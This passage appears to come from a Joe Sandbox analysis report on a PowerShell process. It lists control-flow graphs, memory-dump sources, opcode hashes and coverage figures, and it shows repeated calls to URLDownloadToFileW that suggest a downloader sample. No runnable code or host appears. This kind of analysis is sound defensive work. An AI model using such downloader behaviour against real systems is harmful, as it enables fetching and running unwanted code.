URLDownloadToFileW 10264->10270 10265 7204a34 10265->10200 10266->10265 10267->10265 10268->10265 10269->10265 10270->10265 10272 47c7e4b URLDownloadToFileW 10271->10272 10274 47c7ea8 10272->10274 10274->10246

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 47c7a18-47c7a4a 1 47c7a4c-47c7a53 0->1 2 47c7a90 0->2 4 47c7a64 1->4 5 47c7a55-47c7a62 1->5 3 47c7a93-47c7acf 2->3 11 47c7b58-47c7b63 3->11 12 47c7ad5-47c7ade 3->12 6 47c7a66-47c7a68 4->6 5->6 9 47c7a6f-47c7a71 6->9 10 47c7a6a-47c7a6d 6->10 13 47c7a82 9->13 14 47c7a73-47c7a80 9->14 15 47c7a8e 10->15 18 47c7b65-47c7b68 11->18 19 47c7b72-47c7b94 11->19 12->11 17 47c7ae0-47c7ae6 12->17 16 47c7a84-47c7a86 13->16 14->16 15->3 16->15 20 47c7aec-47c7af9 17->20 21 47c7de8-47c7e52 17->21 18->19 26 47c7c5e-47c7cf6 19->26 27 47c7b9a-47c7ba3 19->27 23 47c7b4f-47c7b56 20->23 24 47c7afb-47c7b2e 20->24 34 47c7e5d-47c7e63 21->34 35 47c7e54-47c7e5a 21->35 23->11 23->17 41 47c7b4b 24->41 42 47c7b30-47c7b33 24->42 66 47c7cf9-47c7d52 26->66 27->21 30 47c7ba9-47c7be7 27->30 48 47c7be9-47c7bff 30->48 49 47c7c01-47c7c14 30->49 39 47c7e65-47c7e6e 34->39 40 47c7e71-47c7ea6 URLDownloadToFileW 34->40 35->34 39->40 50 47c7eaf-47c7ec3 40->50 51 47c7ea8-47c7eae 40->51 41->23 45 47c7b3f-47c7b48 42->45 46 47c7b35-47c7b38 42->46 46->45 52 47c7c16-47c7c1d 48->52 49->52 51->50 53 47c7c1f-47c7c30 52->53 54 47c7c42-47c7c58 52->54 53->54 60 47c7c32-47c7c3b 53->60 54->26 54->27 60->54 79 47c7d55 call 7204610 66->79 80 47c7d55 call 72045f4 66->80 81 47c7d55 call 72045ac 66->81 71 47c7d57-47c7d60 72 47c7d7a-47c7d8d 71->72 73 47c7d62-47c7d78 71->73 74 47c7d8f-47c7d96 72->74 73->74 75 47c7d98-47c7d9e 74->75 76 47c7da5-47c7daf 74->76 75->76 76->66 79->71 80->71 81->71
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2229076821.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_47c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7624fc9947d0db0fd4fc9635f48b77fda82c384754d77964cd54090a4dac81d6
                                                                                                            • Instruction ID: ea8ac8de6e0d83eaf9807dc0971711f1dedb4790a23cc0b009c6cbd8489cabc7
                                                                                                            • Opcode Fuzzy Hash: 7624fc9947d0db0fd4fc9635f48b77fda82c384754d77964cd54090a4dac81d6
                                                                                                            • Instruction Fuzzy Hash: 50E1EA75A0021AEFDB15CF98D584A9EBBB2FF88310F24815DE804AB351DB75AD91CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 82 47c7e00-47c7e52 84 47c7e5d-47c7e63 82->84 85 47c7e54-47c7e5a 82->85 86 47c7e65-47c7e6e 84->86 87 47c7e71-47c7ea6 URLDownloadToFileW 84->87 85->84 86->87 89 47c7eaf-47c7ec3 87->89 90 47c7ea8-47c7eae 87->90 90->89
                                                                                                            APIs
                                                                                                            • URLDownloadToFileW.URLMON(?,00000000,00000008,?,?), ref: 047C7E99
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2229076821.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_47c0000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DownloadFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 1407266417-0
                                                                                                            • Opcode ID: fc961499814a56a9487b433b83335de11b65c3a2e6b68422e0724c3e1f07f3c0
                                                                                                            • Instruction ID: 877429e136ad101bd2a10bb0fcae0fddd61595203146fa5cbaaea5f851531045
                                                                                                            • Opcode Fuzzy Hash: fc961499814a56a9487b433b83335de11b65c3a2e6b68422e0724c3e1f07f3c0
                                                                                                            • Instruction Fuzzy Hash: 4E21E4B6D0165ADFCB04CF99D984ADEFBB4FB48710F10852AE918A7310D774AA54CFA0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 92 7201f40-7201f65 93 7202158-72021a2 92->93 94 7201f6b-7201f70 92->94 102 7202326-720236a 93->102 103 72021a8-72021ad 93->103 95 7201f72-7201f78 94->95 96 7201f88-7201f8c 94->96 98 7201f7a 95->98 99 7201f7c-7201f86 95->99 100 7201f92-7201f94 96->100 101 7202108-7202112 96->101 98->96 99->96 106 7201fa4 100->106 107 7201f96-7201fa2 100->107 104 7202120-7202126 101->104 105 7202114-720211d 101->105 121 7202480-72024b5 102->121 122 7202370-7202375 102->122 108 72021c5-72021c9 103->108 109 72021af-72021b5 103->109 110 7202128-720212a 104->110 111 720212c-7202138 104->111 113 7201fa6-7201fa8 106->113 107->113 118 72022d8-72022e2 108->118 119 72021cf-72021d1 108->119 114 72021b7 109->114 115 72021b9-72021c3 109->115 117 720213a-7202155 110->117 111->117 113->101 120 7201fae-7201fcd 113->120 114->108 115->108 124 72022e4-72022ec 118->124 125 72022ef-72022f5 118->125 126 72021e1 119->126 127 72021d3-72021df 119->127 160 7201fdd 120->160 161 7201fcf-7201fdb 120->161 150 72024e3-72024ed 121->150 151 72024b7-72024d9 121->151 129 7202377-720237d 122->129 130 720238d-7202391 122->130 132 72022f7-72022f9 125->132 133 72022fb-7202307 125->133 131 72021e3-72021e5 126->131 127->131 136 7202381-720238b 129->136 137 720237f 129->137 140 7202432-720243c 130->140 141 7202397-7202399 130->141 131->118 138 72021eb-720220a 131->138 139 7202309-7202323 132->139 133->139 136->130 137->130 175 720221a 138->175 176 720220c-7202218 138->176 143 7202449-720244f 140->143 144 720243e-7202446 140->144 148 72023a9 141->148 149 720239b-72023a7 141->149 154 7202451-7202453 143->154 155 7202455-7202461 143->155 152 72023ab-72023ad 148->152 149->152 156 72024f7-72024fd 150->156 157 72024ef-72024f4 150->157 188 72024db-72024e0 151->188 189 720252d-7202556 151->189 152->140 164 72023b3-72023b5 152->164 165 7202463-720247d 154->165 155->165 166 7202503-720250f 156->166 167 72024ff-7202501 156->167 162 7201fdf-7201fe1 160->162 161->162 162->101 169 7201fe7-7201fee 162->169 170 72023b7-72023bd 164->170 171 72023cf-72023d6 164->171 174 7202511-720252a 166->174 167->174 169->93 177 7201ff4-7201ff9 169->177 179 72023c1-72023cd 170->179 180 72023bf 170->180 181 72023d8-72023de 171->181 182 72023ee-720242f 171->182 185 720221c-720221e 175->185 176->185 186 7202011-7202020 177->186 187 7201ffb-7202001 177->187 179->171 180->171 190 72023e0 181->190 191 72023e2-72023ec 181->191 185->118 194 7202224-720225b 185->194 186->101 204 7202026-7202044 186->204 195 7202003 187->195 196 7202005-720200f 187->196 207 7202585-72025b4 189->207 208 7202558-720257e 189->208 190->182 191->182 215 7202275-720227c 194->215 216 720225d-7202263 194->216 195->186 196->186 204->101 217 720204a-720206f 204->217 218 72025b6-72025d3 207->218 219 72025ed-72025f7 207->219 208->207 220 7202294-72022d5 215->220 221 720227e-7202284 215->221 225 7202265 216->225 226 7202267-7202273 216->226 217->101 241 7202075-720207c 217->241 234 72025d5-72025e7 218->234 235 720263d-7202642 218->235 222 7202600-7202606 219->222 223 72025f9-72025fd 219->223 228 7202286 221->228 229 7202288-7202292 221->229 231 7202608-720260a 222->231 232 720260c-7202618 222->232 225->215 226->215 228->220 229->220 236 720261a-720263a 231->236 232->236 234->219 235->234 244 72020c2-72020f5 241->244 245 720207e-7202099 241->245 256 72020fc-7202105 244->256 249 72020b3-72020b7 245->249 250 720209b-72020a1 245->250 254 72020be-72020c0 249->254 252 72020a3 250->252 253 72020a5-72020b1 250->253 252->249 253->249 254->256
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2233609066.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7200000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3d52b240f11e37ac3f56df57eaf0955c3b0481222eec4781e89230f350bab342
                                                                                                            • Instruction ID: b4bfb80f265c6701090a30165a8d19d2478b36e18d1ca8174dfdfae7b167f55e
                                                                                                            • Opcode Fuzzy Hash: 3d52b240f11e37ac3f56df57eaf0955c3b0481222eec4781e89230f350bab342
                                                                                                            • Instruction Fuzzy Hash: 331204B1B24216CFDB158B68881876ABBE2AFD2210F14807BD905DB6D2DB71C945C7F2

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 261 7204610-720463b 262 7204641-7204646 261->262 263 7204af2-7204b25 261->263 264 7204648-720464e 262->264 265 720465e-7204663 262->265 271 7204b35 263->271 272 7204b27-7204b33 263->272 266 7204650 264->266 267 7204652-720465c 264->267 269 7204673 265->269 270 7204665-7204671 265->270 266->265 267->265 273 7204675-7204677 269->273 270->273 275 7204b37-7204b39 271->275 272->275 276 7204a93-7204a9d 273->276 277 720467d-7204687 273->277 280 7204b7b-7204b85 275->280 281 7204b3b-7204b42 275->281 278 7204aab-7204ab1 276->278 279 7204a9f-7204aa8 276->279 277->263 282 720468d-7204692 277->282 287 7204ab3-7204ab5 278->287 288 7204ab7-7204ac3 278->288 285 7204b87-7204b8b 280->285 286 7204b8e-7204b94 280->286 281->280 289 7204b44-7204b61 281->289 283 7204694-720469a 282->283 284 72046aa-72046b8 282->284 291 720469c 283->291 292 720469e-72046a8 283->292 284->276 303 72046be-72046dd 284->303 293 7204b96-7204b98 286->293 294 7204b9a-7204ba6 286->294 290 7204ac5-7204aef 287->290 288->290 299 7204b63-7204b75 289->299 300 7204bc9-7204bce 289->300 291->284 292->284 298 7204ba8-7204bc6 293->298 294->298 299->280 300->299 303->276 311 72046e3-72046ed 303->311 311->263 312 72046f3-72046f8 311->312 313 7204710-7204714 312->313 314 72046fa-7204700 312->314 313->276 317 720471a-720471e 313->317 315 7204702 314->315 316 7204704-720470e 314->316 315->313 316->313 317->276 318 7204724-7204728 317->318 318->276 320 720472e-720473e 318->320 321 7204744-720476b 320->321 322 72047c6-7204815 320->322 327 7204785-72047b3 321->327 328 720476d-7204773 321->328 339 720481c-720482f 322->339 337 72047c1-72047c4 327->337 338 72047b5-72047b7 327->338 330 7204775 328->330 331 7204777-7204783 328->331 330->327 331->327 337->339 338->337 340 7204835-720485c 339->340 341 72048b7-7204906 339->341 346 7204876-72048a4 340->346 347 720485e-7204864 340->347 358 720490d-7204920 341->358 356 72048b2-72048b5 346->356 357 72048a6-72048a8 346->357 348 7204866 347->348 349 7204868-7204874 347->349 348->346 349->346 356->358 357->356 359 7204926-720494d 358->359 360 72049a8-72049f7 358->360 365 7204967-7204995 359->365 366 720494f-7204955 359->366 377 72049fe-7204a2c 360->377 375 72049a3-72049a6 365->375 376 7204997-7204999 365->376 367 7204957 366->367 368 7204959-7204965 366->368 367->365 368->365 375->377 376->375 382 7204a2f call 47c77e8 377->382 383 7204a2f call 47c7a18 377->383 384 7204a2f call 47c7a08 377->384 385 7204a2f call 47c7c45 377->385 386 7204a2f call 47c7e00 377->386 380 7204a34-7204a90 382->380 383->380 384->380 385->380 386->380
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2233609066.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7200000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 598ae9c5a150849bf3b41e2d5f15daae071f8c1efb6532287a538be58fc302ac
                                                                                                            • Instruction ID: 5d6562af092d402cb79da8fc81029e4d7684f2076de0e4b022d65eeeb0b42b89
                                                                                                            • Opcode Fuzzy Hash: 598ae9c5a150849bf3b41e2d5f15daae071f8c1efb6532287a538be58fc302ac
                                                                                                            • Instruction Fuzzy Hash: C8F128B0B10246EFDB149F68C414B6ABBA2EFC6310F24C569EA059B395DB71DC41CBE1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 530 72045f4-720463b 531 7204641-7204646 530->531 532 7204af2-7204b25 530->532 533 7204648-720464e 531->533 534 720465e-7204663 531->534 540 7204b35 532->540 541 7204b27-7204b33 532->541 535 7204650 533->535 536 7204652-720465c 533->536 538 7204673 534->538 539 7204665-7204671 534->539 535->534 536->534 542 7204675-7204677 538->542 539->542 544 7204b37-7204b39 540->544 541->544 545 7204a93-7204a9d 542->545 546 720467d-7204687 542->546 549 7204b7b-7204b85 544->549 550 7204b3b-7204b42 544->550 547 7204aab-7204ab1 545->547 548 7204a9f-7204aa8 545->548 546->532 551 720468d-7204692 546->551 556 7204ab3-7204ab5 547->556 557 7204ab7-7204ac3 547->557 554 7204b87-7204b8b 549->554 555 7204b8e-7204b94 549->555 550->549 558 7204b44-7204b61 550->558 552 7204694-720469a 551->552 553 72046aa-72046b8 551->553 560 720469c 552->560 561 720469e-72046a8 552->561 553->545 572 72046be-72046dd 553->572 562 7204b96-7204b98 555->562 563 7204b9a-7204ba6 555->563 559 7204ac5-7204aef 556->559 557->559 568 7204b63-7204b75 558->568 569 7204bc9-7204bce 558->569 560->553 561->553 567 7204ba8-7204bc6 562->567 563->567 568->549 569->568 572->545 580 72046e3-72046ed 572->580 580->532 581 72046f3-72046f8 580->581 582 7204710-7204714 581->582 583 72046fa-7204700 581->583 582->545 586 720471a-720471e 582->586 584 7204702 583->584 585 7204704-720470e 583->585 584->582 585->582 586->545 587 7204724-7204728 586->587 587->545 589 720472e-720473e 587->589 590 7204744-720476b 589->590 591 72047c6-7204815 589->591 596 7204785-72047b3 590->596 597 720476d-7204773 590->597 608 720481c-720482f 591->608 606 72047c1-72047c4 596->606 607 72047b5-72047b7 596->607 599 7204775 597->599 600 7204777-7204783 597->600 599->596 600->596 606->608 607->606 609 7204835-720485c 608->609 610 72048b7-7204906 608->610 615 7204876-72048a4 609->615 616 720485e-7204864 609->616 627 720490d-7204920 610->627 625 72048b2-72048b5 615->625 626 72048a6-72048a8 615->626 617 7204866 616->617 618 7204868-7204874 616->618 617->615 618->615 625->627 626->625 628 7204926-720494d 627->628 629 72049a8-72049f7 627->629 634 7204967-7204995 628->634 635 720494f-7204955 628->635 646 72049fe-7204a2c 629->646 644 72049a3-72049a6 634->644 645 7204997-7204999 634->645 636 7204957 635->636 637 7204959-7204965 635->637 636->634 637->634 644->646 645->644 651 7204a2f call 47c77e8 646->651 652 7204a2f call 47c7a18 646->652 653 7204a2f call 47c7a08 646->653 654 7204a2f call 47c7c45 646->654 655 7204a2f call 47c7e00 646->655 649 7204a34-7204a90 651->649 652->649 653->649 654->649 655->649
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2233609066.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7200000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9d70dd395987258e9e0d05d66af1051ac2408b1f0057985cb7d222351c7f31a8
                                                                                                            • Instruction ID: b2473244a1fd51b8ad0a7c9e958569ca3147abb17cd10d754f846623a6b9ceb9
                                                                                                            • Opcode Fuzzy Hash: 9d70dd395987258e9e0d05d66af1051ac2408b1f0057985cb7d222351c7f31a8
                                                                                                            • Instruction Fuzzy Hash: 9591E2B0A20286DFCB14DF58C514B69BBB2BF86710F14C569EA059B396D772EC40CBE1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 656 72045ac-72045c4 657 7204633-720463b 656->657 658 72045c6-72045d1 656->658 661 7204641-7204646 657->661 662 7204af2-7204b25 657->662 659 72045d3-72045d5 658->659 660 72045df-72045f0 658->660 659->660 663 7204648-720464e 661->663 664 720465e-7204663 661->664 671 7204b35 662->671 672 7204b27-7204b33 662->672 665 7204650 663->665 666 7204652-720465c 663->666 668 7204673 664->668 669 7204665-7204671 664->669 665->664 666->664 673 7204675-7204677 668->673 669->673 675 7204b37-7204b39 671->675 672->675 676 7204a93-7204a9d 673->676 677 720467d-7204687 673->677 680 7204b7b-7204b85 675->680 681 7204b3b-7204b42 675->681 678 7204aab-7204ab1 676->678 679 7204a9f-7204aa8 676->679 677->662 682 720468d-7204692 677->682 687 7204ab3-7204ab5 678->687 688 7204ab7-7204ac3 678->688 685 7204b87-7204b8b 680->685 686 7204b8e-7204b94 680->686 681->680 689 7204b44-7204b61 681->689 683 7204694-720469a 682->683 684 72046aa-72046b8 682->684 691 720469c 683->691 692 720469e-72046a8 683->692 684->676 703 72046be-72046dd 684->703 693 7204b96-7204b98 686->693 694 7204b9a-7204ba6 686->694 690 7204ac5-7204aef 687->690 688->690 699 7204b63-7204b75 689->699 700 7204bc9-7204bce 689->700 691->684 692->684 698 7204ba8-7204bc6 693->698 694->698 699->680 700->699 703->676 711 72046e3-72046ed 703->711 711->662 712 72046f3-72046f8 711->712 713 7204710-7204714 712->713 714 72046fa-7204700 712->714 713->676 717 720471a-720471e 713->717 715 7204702 714->715 716 7204704-720470e 714->716 715->713 716->713 717->676 718 7204724-7204728 717->718 718->676 720 720472e-720473e 718->720 721 7204744-720476b 720->721 722 72047c6-7204815 720->722 727 7204785-72047b3 721->727 728 720476d-7204773 721->728 739 720481c-720482f 722->739 737 72047c1-72047c4 727->737 738 72047b5-72047b7 727->738 730 7204775 728->730 731 7204777-7204783 728->731 730->727 731->727 737->739 738->737 740 7204835-720485c 739->740 741 72048b7-7204906 739->741 746 7204876-72048a4 740->746 747 720485e-7204864 740->747 758 720490d-7204920 741->758 756 72048b2-72048b5 746->756 757 72048a6-72048a8 746->757 748 7204866 747->748 749 7204868-7204874 747->749 748->746 749->746 756->758 757->756 759 7204926-720494d 758->759 760 72049a8-72049f7 758->760 765 7204967-7204995 759->765 766 720494f-7204955 759->766 777 72049fe-7204a2c 760->777 775 72049a3-72049a6 765->775 776 7204997-7204999 765->776 767 7204957 766->767 768 7204959-7204965 766->768 767->765 768->765 775->777 776->775 782 7204a2f call 47c77e8 777->782 783 7204a2f call 47c7a18 777->783 784 7204a2f call 47c7a08 777->784 785 7204a2f call 47c7c45 777->785 786 7204a2f call 47c7e00 777->786 780 7204a34-7204a90 782->780 783->780 784->780 785->780 786->780
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2233609066.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7200000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2da8087a6fd062ec0acfa06014202469aef4a3852d6fe17253b6f2a00dfb6791
                                                                                                            • Instruction ID: d96697605b6254fe4ca019f22cd4288712c3cb40241e10340bbdd81c44423c17
                                                                                                            • Opcode Fuzzy Hash: 2da8087a6fd062ec0acfa06014202469aef4a3852d6fe17253b6f2a00dfb6791
                                                                                                            • Instruction Fuzzy Hash: 6891F6F0A20286DFCB149F58C514B29B7B2BF86710F14C569DA059B396D772EC80CBE1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 831 72004f8-720050a 832 7200510-7200521 831->832 833 72005ca-72005fd 831->833 836 7200523-7200529 832->836 837 720053b-7200558 832->837 842 720066b-7200675 833->842 843 72005ff-720063e 833->843 838 720052b 836->838 839 720052d-7200539 836->839 837->833 845 720055a-720057c 837->845 838->837 839->837 846 7200680-7200686 842->846 847 7200677-720067d 842->847 863 7200640-720064e 843->863 864 72006bb-72006c0 843->864 855 7200596-72005ae 845->855 856 720057e-7200584 845->856 848 7200688-720068a 846->848 849 720068c-7200698 846->849 852 720069a-72006b8 848->852 849->852 866 72005b0-72005b2 855->866 867 72005bc-72005c7 855->867 858 7200586 856->858 859 7200588-7200594 856->859 858->855 859->855 870 7200656-7200665 863->870 864->863 866->867 870->842
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2233609066.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7200000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4bad3c4d27cf3bf22b9a3376effcec592afe8972f90f69cfb9dc98df4d6b0226
                                                                                                            • Instruction ID: 5076c377894447215df39139c20866efbb8115edc07f8c1ebd1aec27652dfca2
                                                                                                            • Opcode Fuzzy Hash: 4bad3c4d27cf3bf22b9a3376effcec592afe8972f90f69cfb9dc98df4d6b0226
                                                                                                            • Instruction Fuzzy Hash: FA513CB5B10215AFEB208B688810B2ABFA6EFC5714F14842AE545DF3C6CA71DC4587F1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 967 7201f24-7201f65 968 7202158-72021a2 967->968 969 7201f6b-7201f70 967->969 977 7202326-720236a 968->977 978 72021a8-72021ad 968->978 970 7201f72-7201f78 969->970 971 7201f88-7201f8c 969->971 973 7201f7a 970->973 974 7201f7c-7201f86 970->974 975 7201f92-7201f94 971->975 976 7202108-7202112 971->976 973->971 974->971 981 7201fa4 975->981 982 7201f96-7201fa2 975->982 979 7202120-7202126 976->979 980 7202114-720211d 976->980 996 7202480-72024b5 977->996 997 7202370-7202375 977->997 983 72021c5-72021c9 978->983 984 72021af-72021b5 978->984 985 7202128-720212a 979->985 986 720212c-7202138 979->986 988 7201fa6-7201fa8 981->988 982->988 993 72022d8-72022e2 983->993 994 72021cf-72021d1 983->994 989 72021b7 984->989 990 72021b9-72021c3 984->990 992 720213a-7202155 985->992 986->992 988->976 995 7201fae-7201fcd 988->995 989->983 990->983 999 72022e4-72022ec 993->999 1000 72022ef-72022f5 993->1000 1001 72021e1 994->1001 1002 72021d3-72021df 994->1002 1035 7201fdd 995->1035 1036 7201fcf-7201fdb 995->1036 1025 72024e3-72024ed 996->1025 1026 72024b7-72024d9 996->1026 1004 7202377-720237d 997->1004 1005 720238d-7202391 997->1005 1007 72022f7-72022f9 1000->1007 1008 72022fb-7202307 1000->1008 1006 72021e3-72021e5 1001->1006 1002->1006 1011 7202381-720238b 1004->1011 1012 720237f 1004->1012 1015 7202432-720243c 1005->1015 1016 7202397-7202399 1005->1016 1006->993 1013 72021eb-720220a 1006->1013 1014 7202309-7202323 1007->1014 1008->1014 1011->1005 1012->1005 1050 720221a 1013->1050 1051 720220c-7202218 1013->1051 1018 7202449-720244f 1015->1018 1019 720243e-7202446 1015->1019 1023 72023a9 1016->1023 1024 720239b-72023a7 1016->1024 1029 7202451-7202453 1018->1029 1030 7202455-7202461 1018->1030 1027 72023ab-72023ad 1023->1027 1024->1027 1031 72024f7-72024fd 1025->1031 1032 72024ef-72024f4 1025->1032 1063 72024db-72024e0 1026->1063 1064 720252d-7202556 1026->1064 1027->1015 1039 72023b3-72023b5 1027->1039 1040 7202463-720247d 1029->1040 1030->1040 1041 7202503-720250f 1031->1041 1042 72024ff-7202501 1031->1042 1037 7201fdf-7201fe1 1035->1037 1036->1037 1037->976 1044 7201fe7-7201fee 1037->1044 1045 72023b7-72023bd 1039->1045 1046 72023cf-72023d6 1039->1046 1049 7202511-720252a 1041->1049 1042->1049 1044->968 1052 7201ff4-7201ff9 1044->1052 1054 72023c1-72023cd 1045->1054 1055 72023bf 1045->1055 1056 72023d8-72023de 1046->1056 1057 72023ee-720242f 1046->1057 1060 720221c-720221e 1050->1060 1051->1060 1061 7202011-7202020 1052->1061 1062 7201ffb-7202001 1052->1062 1054->1046 1055->1046 1065 72023e0 1056->1065 1066 72023e2-72023ec 1056->1066 1060->993 1069 7202224-720225b 1060->1069 1061->976 1079 7202026-7202044 1061->1079 1070 7202003 1062->1070 1071 7202005-720200f 1062->1071 1082 7202585-72025b4 1064->1082 1083 7202558-720257e 1064->1083 1065->1057 1066->1057 1090 7202275-720227c 1069->1090 1091 720225d-7202263 1069->1091 1070->1061 1071->1061 1079->976 1092 720204a-720206f 1079->1092 1093 72025b6-72025d3 1082->1093 1094 72025ed-72025f7 1082->1094 1083->1082 1095 7202294-72022d5 1090->1095 1096 720227e-7202284 1090->1096 1100 7202265 1091->1100 1101 7202267-7202273 1091->1101 1092->976 1116 7202075-720207c 1092->1116 1109 72025d5-72025e7 1093->1109 1110 720263d-7202642 1093->1110 1097 7202600-7202606 1094->1097 1098 72025f9-72025fd 1094->1098 1103 7202286 1096->1103 1104 7202288-7202292 1096->1104 1106 7202608-720260a 1097->1106 1107 720260c-7202618 1097->1107 1100->1090 1101->1090 1103->1095 1104->1095 1111 720261a-720263a 1106->1111 1107->1111 1109->1094 1110->1109 1119 72020c2-72020f5 1116->1119 1120 720207e-7202099 1116->1120 1131 72020fc-7202105 1119->1131 1124 72020b3-72020b7 1120->1124 1125 720209b-72020a1 1120->1125 1129 72020be-72020c0 1124->1129 1127 72020a3 1125->1127 1128 72020a5-72020b1 1125->1128 1127->1124 1128->1124 1129->1131
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2233609066.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7200000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 81082f46c3350776d3722a3698f8c188960bb638c8577977fa336ef770045efa
                                                                                                            • Instruction ID: 4ac04fa34373f52b9dc5e26b97560d4863f75cd8c079678956585b790142baf0
                                                                                                            • Opcode Fuzzy Hash: 81082f46c3350776d3722a3698f8c188960bb638c8577977fa336ef770045efa
                                                                                                            • Instruction Fuzzy Hash: DA41E6F0A24303DFCB108B14894866ABBF2FF91750B5581A6DA04EB2D3D771D944C7B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2228652133.000000000462D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0462D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_462d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48082b17747ad89cfdbbfef87fa5fb57362828dc522191d76a56c31865a13cba
                                                                                                            • Instruction ID: be58d1410a8b8aabb479fab567d4bfdc1752eedc49b7e417e506ef25587e9b33
                                                                                                            • Opcode Fuzzy Hash: 48082b17747ad89cfdbbfef87fa5fb57362828dc522191d76a56c31865a13cba
                                                                                                            • Instruction Fuzzy Hash: 4F012B71505750FAE7104F25EE80B67BF98DF51364F08C01ADD484F262E7B8A842CEB1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2228652133.000000000462D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0462D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_462d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c7282f100ae9ff02c8b1f96c4433a9e29d4aa970e79ada172b2b812e976704a6
                                                                                                            • Instruction ID: d96eb2a7e432f8118e5567915641fcd284ee90a754a4c92bd817b3abe3e7e203
                                                                                                            • Opcode Fuzzy Hash: c7282f100ae9ff02c8b1f96c4433a9e29d4aa970e79ada172b2b812e976704a6
                                                                                                            • Instruction Fuzzy Hash: EA01407240E3D09FE7128B25D994B56BFB4DF53224F19C1CBD9888F2A3C2695844CB72

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:6.8%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:60
                                                                                                            Total number of Limit Nodes:16
